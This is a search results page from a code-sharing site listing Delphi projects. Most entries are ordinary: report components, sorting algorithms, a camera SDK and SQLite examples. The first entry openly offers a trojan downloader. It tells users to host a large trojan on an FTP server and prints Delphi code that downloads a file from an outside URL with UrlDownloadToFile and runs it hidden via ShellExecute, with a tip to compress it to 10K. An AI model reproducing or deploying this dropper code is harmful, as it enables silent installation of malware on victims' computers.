Welcome![Sign In][Sign Up]
Location:
Search - delphi l

Search list

[WinSock-NDISmydown

Description: 执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadFile(SourceFile, DestFile: string): Boolean begin GetMem(u,100) GetMem(l,100) u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址 l:= c:/downpage.txt //改为你要存放并打开文件的路径 try Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0 except Result := False end end begin if DownloadFile(u, l) then begin ShellExecute(0, PChar( open ), PChar(l), PChar( ), nil, 0) end //freemem(u) //freemem(l) end. 先试一下。。。。 ok, 明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R *. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http : / / www.jm-my.com/ip2.txt / / read you want to download the website l : = c : / downpage.txt / / read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Platform: | Size: 1436 | Author: 韩冰 | Hits:

[Multimedia program200631

Description: 是一个基于L系统的简单分形图形,用的是DELPHI开发。-L is a system based on a simple fractal graphics, using the Delphi development.
Platform: | Size: 13773 | Author: dany | Hits:

[Hook apiDLLMapFile

Description: notdllHookKey1 Delphi下深入Windows核心编程 DLL及数据共享-notdllHookKey1 Delphi-depth core Windows programming DL L and data sharing
Platform: | Size: 182112 | Author: abc | Hits:

[ActiveX/DCOM/ATLgrid++report

Description: Grid++Report是一款高性能的报表组件(构件/控件),特别适用于管理信息系统(如ERP、进销存、财务等)的报表开发。提供一个具有超强数据展现能力的数据网格(DataGrid)部件,制作各种表格报表非常简便;运行时可通过事件响应使报表与用户交互;针对票据套打进行了专门实现;总之Grid++Report 是制作动态报表的最佳选择。提供可视化报表设计器,设计报表快速简单。Grid++Report除了提供打印功能外,还提供报表的查询显示功能,即如各种数据网格(DataGrid)控件一样显示数据,让报表的查询显示与打印一次实现,既提高开发效率又保持数据的一致性,这也是Grid++Report与其它报表构件的最大区别。Grid++Report 适用于所有支持COM的开发平台,为Visual Basic、Visual C++、Delphi、C++Builder编写了大量例程。采用VC+COM+ATL+WTL开发,运行性能高,重新发布简单、发布文件小且不依赖任何运行时库。-Grid Report is a high-performance components statements (Component / control), particularly applicable to the management of information systems (such as ERP, Invoicing, financial, etc.) to develop the statements. Provide a superior ability to display data in Data Grid (DataGrid) components, statements made various forms is very simple; running through incident response made statements interact with the user; against paper chromatography printing for a special achievement; In short Grid Report is produced dynamic statements for the best choice. Visualization statements for the design, design fast and simple statements. Grid Report addition to providing printing function, it also provided statements to the inquiry showed functions, that is, if the data grid (DataGrid) controls showed that, l
Platform: | Size: 4330706 | Author: wang | Hits:

[Special Effectsyueguang

Description: 分而治之方法还可以用于实现另一种完全不同的排序方法,这种排序法称为快速排序(quick sort)。在这种方法中, n 个元素被分成三段(组):左段l e f t,右段r i g h t和中段m i d d l e。中段仅包含一个元素。左段中各元素都小于等于中段元素,右段中各元素都大于等于中段元素。因此l e f t和r i g h t中的元素可以独立排序,并且不必对l e f t和r i g h t的排序结果进行合并。m i d d l e中的元素被称为支点( p i v o t )。图1 4 - 9中给出了快速排序的伪代码,,Delphi 赫夫曼编码.rar.rar - 用delhi做的程序实现了哈夫曼编码,做的还不错。,,Delphi -divide and rule method can be used to achieve an entirely different sort of way This sorting called Quick Sort (quick sort). In this approach, n elements is divided into three (group) : Left of the l e f t, Right of g h i r t and middle m i d e d l. Middle contains only one element. Left of the elements are less than equal to the middle element of the right elements are larger than the middle element. So l and f t e r t h i g of elemental independent sort, and no need to l and f t e r t h i g ranking results merger. M i d e d l The element known as Fulcrum (p i v o t). Figure 1 4-9 is given a quick sort of pseudo-code. Delphi Hefuman coding. rar.rar - delhi do with the realization of Huffman coding. doing quite well. ,, Delphi
Platform: | Size: 2489430 | Author: 罗成芝 | Hits:

[Other resourceDelphi_sjkkfjdal

Description: 光盘上的示例程序都是在Delphi7.0和SQL Server 2000个人版下调试通过的,使用的操作系统是Microsoft Windows 2000(Professional)-on the CD are examples of procedures in Delphi and SQL Server 2000 Personal the next version of the debugging, the operating system is Microsoft Windows 2000 (Professiona l)
Platform: | Size: 2908441 | Author: 新月 | Hits:

[CommunicationPortControl

Description: 并口控制信号的VC接口,将头文件(WinIo.h)和库文件(WinIo.lib)加入到工程即可-parallel port control signal VC interface, head (WinIo.h) and libraries (WinIo.lib) can be added to the project
Platform: | Size: 20480 | Author: 陈先俞 | Hits:

[SQL ServerDelphi_sjkkfjdal

Description: 光盘上的示例程序都是在Delphi7.0和SQL Server 2000个人版下调试通过的,使用的操作系统是Microsoft Windows 2000(Professional)-on the CD are examples of procedures in Delphi and SQL Server 2000 Personal the next version of the debugging, the operating system is Microsoft Windows 2000 (Professiona l)
Platform: | Size: 2908160 | Author: 新月 | Hits:

[Delphi VCLiocp-server

Description:
Platform: | Size: 964608 | Author: 哀鸣 | Hits:

[SQL Serverswsupdate

Description: 本程序是在vagrant的升级程序上增加了SQL数据库的更新升级功能系统中采用了ACCES来存储数据更新的指令 从而达到逐步执行SQL代码的功能,因为在SQL中要创建表、存储过程、视图等对象时,需要删除原有老的对象,但是SQ L不支持将这些指令存放在一起从而导致出错所以用ACCES来存储数据了 -This procedure is in the vagrant escalation procedures increased by SQL database upgrade function to update the system used to store data ACCES updated instructions to achieve the progressive implementation of the functions of SQL code, because in SQL to create tables, stored procedures, views, etc. object, need to delete the original object of the old, but SQL does not support these directives will be stored together resulting error is therefore ACCES to store data
Platform: | Size: 686080 | Author: | Hits:

[Delphi/CppBuilderWinIo

Description: PC 端口控制,方便编程,如LPT读写等。-PC port control, to facilitate programming, such as reading and writing, such as LPT.
Platform: | Size: 189440 | Author: zff | Hits:

[AlgorithmStrassen

Description: algorithme de multiplication suivant l algorithme de Strassen diviser pour regner pour exemplaire de taille n.
Platform: | Size: 4096 | Author: iiazo | Hits:

[Compress-Decompress algrithmsD7_rar_example

Description: Example of using unrar lib (unrar.dll not included!). Delphi 7
Platform: | Size: 18432 | Author: Camel | Hits:

[Windows Developcornerpanel

Description: TCornerPanel is an L-shaped panel component. Includes 3D, Line or no borders.
Platform: | Size: 3072 | Author: anoubis | Hits:

[OS programCanon_Digital_Camera_SDK__CD-SDK_v6.1.2

Description: 佳能数码相机的开发包,含有Delphi、VB、VC6的例子,支持下列型号: PowerShot A10, PowerShot A20, PowerShot A30, PowerShot A40, PowerShot A60, PowerShot A70, PowerShot A80, PowerShot A100, PowerShot A200, PowerShot A300, PowerShot S10, PowerShot S20, PowerShot S30, PowerShot S40, PowerShot S45, PowerShot S50 PowerShot S100, IXY DIGITAL, DIGITAL IXUS, PowerShot S110, IXY DIGITAL 200, DIGITAL IXUS v, PowerShot S200, IXY DIGITAL 200a, DIGITAL IXUS v2, PowerShot S230, IXY DIGITAL 320, DIGITAL IXUS v3, PowerShot S300, IXY DIGITAL 300, DIGITAL IXUS 300, PowerShot S330, IXY DIGITAL 300a, DIGITAL IXUS 330, PowerShot S400, IXY DIGITAL 400, DIGITAL IXUS 400, PowerShot SD100, IXY DIGITAL 30, DIGITAL IXUS II, PowerShot SD10, IXY DIGITAL L, DIGITAL IXUS i, PowerShot G1, PowerShot G2, PowerShot G3, PowerShot G5 PowerShot Pro90 IS EOS-1D, EOS-1Ds, EOS D30, EOS D60, EOS 10D EOS Kiss Digital, EOS Digital Rebel, EOS 300D
Platform: | Size: 4726784 | Author: 果の果ooοО | Hits:

[SCM2

Description: 本文包括了Modbus两种协议的校验编程,包括LRC校验和CRC校验。 LRC校验是使用在ASCII协议中的,CRC校验是使用在RTU协议中的-This article includes two kinds of protocols Modbus validation program, including the LRC checksum CRC checksum. LRC check is to use the ASCII agreements, CRC checksum is used in the RTU agreements
Platform: | Size: 75776 | Author: hong | Hits:

[Applicationsdelphifr_JOYSTICK-V1___Page

Description: Etude sur l utilisation d un joystick type manette playstation. Affichage en temps réel du contenu d une structure JOYINFOEX. Testé avec un joypad Saitek Rumble P480.
Platform: | Size: 11264 | Author: imene | Hits:

[Delphi VCLDelphi-ASqlite3

Description: Delphi使用连接SQLite上例子,n ASGSqlite set the correct declaration: // enable this if you want to link the SQLite library statically. (No need for dll) {.$DEFINE SQLite_Static} The most actual obj files needed for linking can be downloaded the download section of www.aducom.com Change the first obj reference in the source to the correct obj, currently {$L OBJ\sqlite3_3_4.obj } The website of Aducom SOftware is bilangual. The sqlite components and documentation will be found on the English section of the website ( english in the language pull-down). -Delphi uses the example Sqlite3 connection SQLite
Platform: | Size: 2423808 | Author: zhou | Hits:

[Delphi VCL30118_android_l_style_pack_for_xe7

Description: Android L Style pack for Delphi Studio xe7
Platform: | Size: 1095680 | Author: Scroll Raider | Hits:

[Streaming Mpeg4捕捉屏幕图像CS源代码

Description: l 捕获声音和视频,并将他们写入到一个AVI文件中。 l 动态连接和断开视频和音频的输入设备。 l 使用覆盖或预览的方法去显示当前的视频信号。 l 指定一个文件用于捕获,并且把这个捕获文件的内容拷贝给另一个文件。 l 设定捕获图像速度(好多帧)。 l 显示对话框用于控制视频源和格式。 l 创建、保存、加载调色板。 l 拷贝图像和调色板到剪贴板中。 l 捕获并把图像作为一个DIB位图保存。(HWndC = capCreateCaptureWindow ( "My Own Capture Window", WS_CHILD | WS_VISIBLE , 0 , 0, 160, 120, hwndParent, nID); SendMessage ( hWndC, WM_CAP_DRIVER_CONNECT, 0 , 0L); SendMessage ( hWndC, WM_CAP_SEQUENCE, 0, 0L);)
Platform: | Size: 31744 | Author: 煜坤 | Hits:
« 1 23 »

CodeBus www.codebus.net